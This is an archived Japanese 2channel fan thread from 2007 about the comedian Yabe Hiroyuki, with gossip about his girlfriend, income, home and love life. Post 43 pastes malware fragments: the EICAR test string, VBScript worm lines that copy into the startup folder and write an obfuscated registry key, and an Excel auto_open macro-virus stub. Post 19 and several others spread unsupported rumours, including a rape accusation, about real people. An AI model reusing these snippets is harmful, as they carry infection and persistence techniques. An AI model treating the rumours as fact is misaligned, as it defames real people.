5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

矢部浩之 Part13

1 :やべっち(・∀・):2007/02/17(土) 21:50:49
ナインティナインの矢部浩之応援スレッド

※アンチはアンチスレへ(ローカルルール参照)
※無駄な埋め立て禁止
※煽りや荒しはスルー
※sage推奨

前スレ
http://tv9.2ch.net/test/read.cgi/geinin/1159838787/

2 :1:2007/02/17(土) 21:51:19
このスレなかったことにして下さい

3 :名無しさん@板分割議論中:2007/02/17(土) 21:52:22
スレ立て依頼した者です
>>1
乙です!



4 :名無しさん@板分割議論中:2007/02/17(土) 21:52:49
4

5 :名無しさん@板分割議論中:2007/02/17(土) 21:54:08


6 :名無しさん@板分割議論中:2007/02/17(土) 21:58:40
>>1


やべっち萌えー

7 :名無しさん@板分割議論中:2007/02/17(土) 22:00:10
矢部っちって結局ひとみちゃんと
どうなってるの?

8 :名無しさん@板分割議論中:2007/02/17(土) 22:16:57
そのまんまひとみ

9 :名無しさん@板分割議論中:2007/02/17(土) 22:51:48
>>7
なんだかんだ言って腐れ縁

10 :名無しさん@板分割議論中:2007/02/17(土) 23:07:58
最近めちゃイケでひとみの名前よく出てくるね、ラジオじゃさっぱり名前聞かなくなったけど
同棲してるんだっけ?

11 :名無しさん@板分割議論中:2007/02/17(土) 23:13:53
ひとみのチキンカレーは旨い

12 :名無しさん@板分割議論中:2007/02/17(土) 23:51:01
ヒルズで同棲
多少の遊びも許してくれるひとみはもう妻みたいなもん

13 :名無しさん@板分割議論中:2007/02/18(日) 01:14:36
カッコイイ
KISSしたい

14 :名無しさん@板分割議論中:2007/02/18(日) 01:19:38
長く付き合いすぎると結婚に至らずに結局破局してしまう事が多い気がする
矢部の場合はどうなんだか

15 :名無しさん@板分割議論中:2007/02/18(日) 04:32:46
サイズ見てたがいいTV持ってんのな

16 :名無しさん@板分割議論中:2007/02/18(日) 04:43:59
マッタリ感が堪らない
矢部の空気は最高にリラックスできる

17 :名無しさん@板分割議論中:2007/02/18(日) 12:17:01
>>1


最近の矢部を見てると大御所まで成長しそうな期待感がある

18 :名無しさん@板分割議論中:2007/02/18(日) 17:32:05
とっくに大御所だろヒルズ族なんだから

19 :名無しさん@板分割議論中:2007/02/18(日) 17:45:59
この人レイプしたんでしょう

20 :名無しさん@板分割議論中:2007/02/18(日) 17:53:39
カいとるな?

21 :名無しさん@板分割議論中:2007/02/18(日) 18:25:48
お笑い芸人なのに役者も出来て司会もやれるって凄いよね

22 :名無しさん@板分割議論中:2007/02/18(日) 18:28:27
サッカーも相当上手いみたいやね
そりゃモテモテやわね

23 :名無しさん@板分割議論中:2007/02/18(日) 18:55:37
矢部〜!
矢部〜!
サッカー!
ぶふぉ^^

24 :名無しさん@板分割議論中:2007/02/18(日) 19:01:48
かっこよすぎ

25 :名無しさん@板分割議論中:2007/02/18(日) 19:40:44
矢部の好きなタイプの女ってどんなのなんだろう

26 :名無しさん@板分割議論中:2007/02/18(日) 19:57:11
>>25
大塚寧々

27 :名無しさん@板分割議論中:2007/02/18(日) 20:15:06
大塚寧々は美人だよね
ああいうのがいいのね…

28 :名無しさん@板分割議論中:2007/02/18(日) 21:32:34
悩み相談したいタイプ
話し聴いてくれるだけで楽になれそう

29 :名無しさん@板分割議論中:2007/02/18(日) 21:55:50
>>25
Tバックスの千葉ともいってたけど。
趣味悪いとおもったが。

30 :名無しさん@板分割議論中:2007/02/18(日) 23:12:11
ヒトミ国原英夫

31 :名無しさん@板分割議論中:2007/02/19(月) 01:32:37
千葉って古い方か?

32 :名無しさん@板分割議論中:2007/02/19(月) 05:39:58
実は運動神経が良い

33 :名無しさん@板分割議論中:2007/02/19(月) 13:44:39
まあサッカーうまいしな

34 :名無しさん@板分割議論中:2007/02/19(月) 14:02:37
ヒデの方が上手い

35 :名無しさん@板分割議論中:2007/02/19(月) 14:41:58
ヒデよりサッカー上手い芸人はいない

36 :名無しさん@板分割議論中:2007/02/19(月) 14:43:35
ヒデ、ワッキーが最も上手くて、矢部や木梨あたりが続く感じか
他にもいたような気がするが

37 :名無しさん@板分割議論中:2007/02/19(月) 14:48:27
ひらはた最強説

38 :名無しさん@板分割議論中:2007/02/19(月) 15:54:11
ひらちゃんサッカー上手いの?

39 :名無しさん@板分割議論中:2007/02/19(月) 15:57:22
フラッシュに撮られた元アイドルって誰だ?

40 :名無しさん@板分割議論中:2007/02/19(月) 16:06:33
いつ撮られたの?

41 :名無しさん@板分割議論中:2007/02/19(月) 16:36:59
>>32
スノボ、スキーは一通りこなす
野球は肩が良いし、カーブが投げられる
めちゃイケでバレーボール上手かった
ゴルフもたぶんやらせたら上手い
球技が得意
こういう奴クラスに一人はいた

42 :名無しさん@板分割議論中:2007/02/19(月) 16:41:05
FLASHホムペ載ってねえ
ガセか

43 :名無しさん@板分割議論中:2007/02/19(月) 18:17:09
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


44 :名無しさん@板分割議論中:2007/02/19(月) 20:27:52
プッチバカなのと線が細い以外は完璧だなこの人

45 :名無しさん:2007/02/20(火) 09:24:44
大人の色気満載

46 :名無しさん:2007/02/20(火) 17:40:56
指が綺麗
スーツが似合う
意外に顔が小さい
だからスタイル良く見える

どこにでもいそうでいない
いい男

47 :名無しさん:2007/02/20(火) 18:31:04
矢部っちはサインでも気軽に「ええで〜」と言ってくれそう
岡村は嫌なオーラ出しまくりだと思う
性格良くて顔が良くて金持ちの矢部っち
この際結婚しないで欲しい

48 :名無しさん:2007/02/20(火) 20:43:56
金持ってるのが最大の魅力
しかしそれだけじゃない素敵オーラが出てる
受け止めてくれる包容力を感じる
これが大人の余裕なのか

49 :名無しさん:2007/02/20(火) 21:01:33
番組見てても思うが矢部は女の扱い上手そう

50 :名無しさん:2007/02/21(水) 03:14:52
CL見んのかな

51 :名無しさん:2007/02/21(水) 07:01:40
イチャつきたい
ずっとキスしていたい

52 :名無しさん:2007/02/21(水) 14:17:20
>>48
めちゃイケのめ安箱で「ひとみちゃんは矢部さんのどこが好き?」という質問に、「たぶんなんスけど、包容力」って答えてたよな。


53 :名無しさん:2007/02/21(水) 14:21:12
地位、金、ルックス、スタイル、ファッションセンス、ツッコミ上手、サッカー得意、軟体(?)、包容力(自称)

これだけ兼ねそろえてるタレントさんなかなかいないよな

54 :名無しさん:2007/02/21(水) 16:36:51
雰囲気もいい

55 :名無しさん:2007/02/21(水) 16:59:27
やべっち(・∀・)

56 :名無しさん:2007/02/21(水) 17:18:43
家賃200万のヒルズに住む矢部っち
大画面テレビでWILLしてそう


57 :名無しさん:2007/02/21(水) 17:20:04


細チン 矢部
ガリガリ




58 :名無しさん:2007/02/21(水) 17:32:53
ヒトミとまだ付き合ってるとしたら今何年目だ?10年越えてるよな

59 :名無しさん:2007/02/21(水) 17:52:08
天然素材時代の矢部の追っかけだった。付き合った当時
18歳ぐらいで今30歳だと思うから12年間付き合っている

60 :名無しさん:2007/02/21(水) 18:04:38
なんかもう12年も付き合ってたら別れにくそうだな

61 :名無しさん:2007/02/21(水) 18:52:08
ひとみちゃんは矢部の事をダーと呼ぶ
天然入ったミキティ似のかわいい娘
料理がうまくてチキンカレーや鍋が絶品
こんなお似合いのカップルいない
ぜひ結婚して幸せになってもらいたい

62 :名無しさん:2007/02/21(水) 18:54:01
とはいってもひとみの顔や声すら知らないんだけどな
一般人だから当然だが・・・

63 :名無しさん:2007/02/21(水) 18:58:22
やべっちの住んでる部屋は40万〜70万くらいのとこだってずーっと前に文春かなんかに載ってたよ
それに、面接みたいなのがあって誰でもが入居できるわけじゃないとも読んだことある

64 :名無しさん:2007/02/21(水) 19:03:20
声はラジオで流れたことあるよ
天然っぽいしゃべりかただったなぁ
これは俺の感想だけど

65 :名無しさん:2007/02/21(水) 19:04:59
矢部っていっぱい誘いありそうなのによくもまあヒトミと続いてるな

66 :名無しさん:2007/02/21(水) 20:25:59
>>63
ヒルズレジデンスがそんなに安い訳ないじゃん
ホリエモンの階より2〜3階下らしいから
200万位だって
ホリエモンの家賃が220万だから


67 :名無しさん:2007/02/21(水) 21:09:11
いつまでヒルズにいるんだろうね

68 :名無しさん:2007/02/21(水) 21:58:34
>>67
結婚するまでじゃね
結婚したら既に購入の世田谷の土地に家建てると思う
この土地の名義が矢部とひとみの両方の名義らしい
この件のせいで、ひとみとは別れられないという噂もある


69 :名無しさん:2007/02/21(水) 22:07:21
人徳がある
Dの加治、作家の高須などスタッフから好かれてる
人当たり良さそうだからか
フットサルやる時もすぐ人が集まるし
後輩の面倒見もいいみたい

70 :名無しさん:2007/02/21(水) 22:11:08
>>68
そこまで任せてるってことは
やっぱり事実上の妻だなひとみは

71 :名無しさん:2007/02/21(水) 22:23:46
そこまでしてるなら結婚してしまえばいいのにな

72 :名無しさん:2007/02/21(水) 22:43:42
世田谷の土地はすでに売却済み。

73 :名無しさん:2007/02/21(水) 23:21:28
>>69
そりゃ矢部会という派閥で100人以上の無名芸人を率いてるんだから、頼もしい兄さん肌があるのはわかるよな。
ちなみに矢部会のメンバーの知名度No.1は原口とホリなんだってな。


74 :名無しさん:2007/02/21(水) 23:26:17
めちゃイケじゃ時折聞くけどANNじゃひとみの言葉自体さっぱり
聞かなくなったね。別れた可能性もなくはないかもね。

75 :名無しさん:2007/02/21(水) 23:50:51
annでは言わないだけじゃない?
別れてたらめちゃイケでも言わないはずだし

76 :名無しさん:2007/02/22(木) 01:11:46
>>72
マジで?
知らなかったよ
よけいに、ひとみちゃんとヤバイじゃんw
別れたぽいな

77 :名無しさん:2007/02/22(木) 01:23:10
ANNにメールしてみればいいがなw

78 :名無しさん:2007/02/22(木) 01:33:55
めちゃイケでネタにしてる限り
別れてないだろ

79 :名無しさん:2007/02/22(木) 01:56:28
>>73
矢部会ならそうだが、遠藤、ぐっさん、平畠、ワッキー
品庄、森三中、藤森、黒田、小杉、等吉本に限らず
ほとんどの若手と飲んでいる。淳とも飲む機会あったみたいだし
宮迫と飲んだみたいな話もある。矢部はそういうの
しゃべんねぇからわかんないよな
サッカー選手とか椎名きっぺいと交流あるみたいだし

80 :名無しさん:2007/02/22(木) 01:58:25
以前はひとみちゃんとの話ラジオでもちょくちょくしてたな。南の島行ったり
温泉旅行でプイッとそっぽ向かれたり…

81 :名無しさん:2007/02/22(木) 02:42:21
やべっちは奢るの好きそう
岡村とは逆だね
矢部会では、来た芸人何十人もの帰りのタクシー代まで払うとか
痩せてるのに太っ腹w

82 :名無しさん:2007/02/22(木) 02:43:31
ファンとしては別れてたら正直ショックだけれど
矢部も一人の男なんだから仕方ないか


83 :名無しさん:2007/02/22(木) 02:53:18
国分も別れた品、つか矢部には大物女優と結婚して欲しかったり
てか矢部、結構色んな人と飲んでるんだな
サッカー選手なら名波と仲良しだったっけな

84 :名無しさん:2007/02/22(木) 03:19:07
矢部の女性遍歴って99年の時点では4人だけなんだな(ANN年表参照)
芸能人にしたら少ない方かね?とはいってもカキタレ遍歴なら相当ありそうな気がするなw

85 :名無しさん:2007/02/22(木) 04:35:50
ここは矢部ファン多くていいねー。
2ちゃんで矢部叩いてるやつって人を見る目がなさそう…。

>>84
カキタレ遍歴なら相当すごいよ。昔ANNで3桁は当たり前みたいな感じだったから
現在はどれほどか創造もつかない笑
やっぱ次元が違うわな矢部っちは。でもなんだろうこの親近感。

86 :名無しさん:2007/02/22(木) 04:38:27
下げ忘れた。。

87 :名無しさん:2007/02/22(木) 05:20:52
大物をカいた事はあるんだるうか

88 :名無しさん:2007/02/22(木) 09:06:29
>>69
矢部の周りはいつもスタッフでいっぱいらしいからな

89 :名無しさん:2007/02/22(木) 09:44:45
>>87
あるみたいだが表に出てない


90 :名無しさん:2007/02/22(木) 13:43:21
それを芸の肥やしとして認めてくれてる
ひとみはやっぱ芸人の妻だよな

91 :名無しさん:2007/02/22(木) 14:26:26
ヒルズに住む理由ってパパラッチ対策か?

92 :名無しさん:2007/02/22(木) 18:00:38
>>81
さんま御殿で誕生会を後輩が開いてくれて
カラオケ代や飯代、プレゼントも自分の誕生日なのに
全額矢部が払ったって言ってた。ン十万したらしい
フットサルのコート代も相手チームに出させないで
全部自分で払う気前の良さ
普通実家があれだけ貧乏ならケチになりそうだけどな
稼いでる額が違うのもあるか

93 :名無しさん:2007/02/22(木) 18:11:08
>>85
>でもなんだろうこの親近感。

わかるわぁ
気さくで、人当たりがいいからかな
芸能人なんだけど普通ぽいし
でも実際は黒服の付き人やスタッフに囲まれていてモロ
ザ・芸能人なんだろうなぁ






94 :名無しさん:2007/02/22(木) 18:44:10
マルチ多いなw

95 :名無しさん:2007/02/22(木) 18:55:27
>>91
それもあるんじゃないかな

96 :名無しさん:2007/02/22(木) 19:16:15
お笑い界のVIPだからね

97 :名無しさん:2007/02/22(木) 19:31:55
中学で童貞捨てて、高校の時はハンパなくモテた
生粋のモテ男
飾らない自然体で女性を引き付ける空気を持っている

98 :名無しさん:2007/02/22(木) 20:33:53
年収っていくらぐらいなんだろうか

99 :名無しさん:2007/02/22(木) 20:48:26
2億〜3億くらいでない?ヒルズの高級マンション住むくらいなんだから、相当な経済力必要だろう。
テレ朝に近いから、自身の番組の収録に向かうのに便利そうだな。



100 :名無しさん:2007/02/22(木) 20:51:53
推定1億2千万
10人いないとされる吉本1億円プレイヤーの内の一人

101 :名無しさん:2007/02/22(木) 20:55:54
3億はないと思うが、2億はあるんでない?
つってもヒルズが月200万として年2400万、奢りまくりな事考えると
年に5000万前後は使ってそうな感じがするな
貯金ちゃんとしてんのかな?

102 :名無しさん:2007/02/22(木) 21:07:20
納税額が3400万。だいたい×3が手取りだと聞いた事がある
×4かもしれない。今でも長者番付があればなぁ

103 :名無しさん:2007/02/22(木) 21:14:17
節税してるとは思うけどね

104 :名無しさん:2007/02/22(木) 21:16:44
吉本興業の1億円プレイヤーは明石家さんま、島田紳助、松本人志、浜田雅功、岡村隆史、矢部浩之、西川きよし、間寛平、桂三枝かな?

これ以外に誰かいるか?




105 :名無しさん:2007/02/22(木) 21:18:07
ロンブーや加藤とかは億超えてないのか?

106 :名無しさん:2007/02/22(木) 21:25:52
あとは、今田じゃないか?山口もCM多いから超えてるかも

107 :名無しさん:2007/02/22(木) 21:27:50
さんまとかみのもんたみたいに個人事務所で節税してると
長者番付の上位に入ってこないからそれだけでは本当の
所得はわかんない

108 :名無しさん:2007/02/22(木) 21:40:21
矢部は1億だけどピンじゃ使い物にならない岡村は違うよ

109 :名無しさん:2007/02/22(木) 23:06:55
>>104
きよし、三枝、かんぺいは1億越え無理じゃない?
関西のギャラは関東の三分の一らしいし

矢部っちは個人事務所持ってるんじゃかった?
節税対策してるから二億は稼いでそう



110 :名無しさん:2007/02/22(木) 23:55:36
誘い笑いのテクニックが凄い
これで救われた芸人がどれほどいるか

111 :名無しさん:2007/02/23(金) 01:31:02
リアディゾンって矢部の「S」に火をつけるような喋りって感じるの俺だけ?

112 :名無しさん:2007/02/23(金) 01:40:34
姉貴が矢部のファン
冷たそうなのがたまらないって
意味わからん

113 :名無しさん:2007/02/23(金) 01:43:19
>>112
おまいの姉貴Mなんじゃないのか?

114 :名無しさん:2007/02/23(金) 03:13:39
矢部も結構リア・ディゾン気に入ってそうな感じだったな

115 :名無しさん:2007/02/23(金) 04:37:39
んね

116 :名無しさん:2007/02/23(金) 04:43:31
前田アナはリアに対して嫉妬してたらウケるw
生理的に前田アナ受け付けないのって俺だけではないはず!

117 :名無しさん:2007/02/23(金) 04:51:10
岡村がかわいいって言うのはしょっちゅうやけどリアは矢部も言ってたよな
矢部がかわいいとか言うのあんま聞かないし。リアは矢部に興味ないとは思うけどw

118 :名無しさん:2007/02/23(金) 12:37:13
>>112
女性は基本Mらしい
だから矢部は需要があるしモテる

119 :名無しさん:2007/02/23(金) 13:55:39
他の芸人が体張って苦しんでるところを見てて楽しくてしかたがないドS矢部浩之逆に岡村隆史はドM
だからコンビとして成り立ち、バランスが取れている。最近サイズのオープニングやめちゃイケでも二人のコンビネーションがよくなってきた気がする。

120 :名無しさん:2007/02/23(金) 14:03:55
>>116
やべっちFC見てると前田アナは本当に矢部の事が好きそうだな
それとも他の番組でもああいう感じなのか?
ああいうスタンスの人いるよ。馴れ馴れしい感じの人

121 :名無しさん:2007/02/23(金) 14:36:33
カいてるんじゃないw?

昨日美輪ネタで矢部の片手運転がいじられてたが矢部の片手運転たしかに
なんかカッコイイというか色気あるんだよね

122 :名無しさん:2007/02/23(金) 14:43:08
>>120
やべっちでの前田は銭金やナントカでの前田と比べて、目が輝いてるもん。
ナントカと銭金はやっつけ仕事でやってるもん

123 :名無しさん:2007/02/23(金) 15:36:15
>>97
童貞捨てたのは高1の時じゃなかった?スーツ着てw

>>104
去年の話だけど、珍助が何かの番組で
「吉本で1億円超えてるのは7人しかいない」って言ってたよ
さんま〜西川きよしまでの7人じゃないかな
今田は2005年の年末番組に出まくってたから超えたかも

124 :名無しさん:2007/02/23(金) 17:14:05
どこかで見たけど
前田はFCがある時、必ず矢部の楽屋で入り浸ってるらしい

ANNの美輪のコーナー面白い
浩之は○○それは愛〜
やべっちもマジ受けてる





125 :名無しさん:2007/02/23(金) 17:37:42
>>124
…かいとるなノブオ

126 :名無しさん:2007/02/23(金) 17:38:08
>>123
吉本興業で年収1億超えてるタレント

明石家さんま、島田紳助、松本人志、浜田雅功までは確実なんだが、岡村と矢部が微妙なんだよ。
岡村は家賃150万のマンション住んでるくらいだし、矢部もヒルズ族だから、年収1億以上ないとそんなとこ住まないよな。
ロンブー、加藤浩次、東野、今田も1億まではいかないが、それ近くはもらってそうだし。
という事は吉本の1億円プレーヤー7人は、さんま、紳助、松本、浜田、岡村、矢部、きよしなのかね?


127 :名無しさん:2007/02/23(金) 17:47:55
>>126
ナイナイは2億超えてるはず
加藤もスッキリ始まってから越えたかも
今田は特番に出まくってた次の年は越えていたと思う
ロンブーと東野は超えてないと思う
西川きよしは、大御所ってだけでギャラが高いらしいですよ

128 :名無しさん:2007/02/23(金) 17:50:02
やべっちの兄貴も芸能プロの社長だっけ

129 :名無しさん:2007/02/23(金) 18:00:55
>>123
矢部が童貞捨てたのは中3の時、22才の女性と。
スーツ着て女の家に行った

ちなみに初キスは中2の時、一個上の女の子と。
その女の子が矢部の事が可愛い過ぎて無理矢理キスした
ちょっとヤンキーの子だった

130 :名無しさん:2007/02/23(金) 19:30:56
子供の頃からもててたんだな

131 :名無しさん:2007/02/23(金) 19:39:03
>>129

中3で22歳女とって女は犯罪じゃね?w

132 :名無しさん:2007/02/23(金) 20:05:18
矢部ってゴルフやってるのかな

133 :名無しさん:2007/02/23(金) 21:03:15
>>127

8億以上・・・明石家さんま、島田紳助

5億以上・・・松本人志、浜田雅功

2億以上・・・岡村隆史、矢部浩之

1億以上・・・西川きよし、今田耕司(?)、ロンブー(?)、加藤浩次(?)

ってとこかね?

134 :名無しさん:2007/02/23(金) 21:05:54
矢部はゴルフやってないよ
サイズでタモリからもらった
クラブをリサイクルに出してた
やれば相当うまくなると思うけどね

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)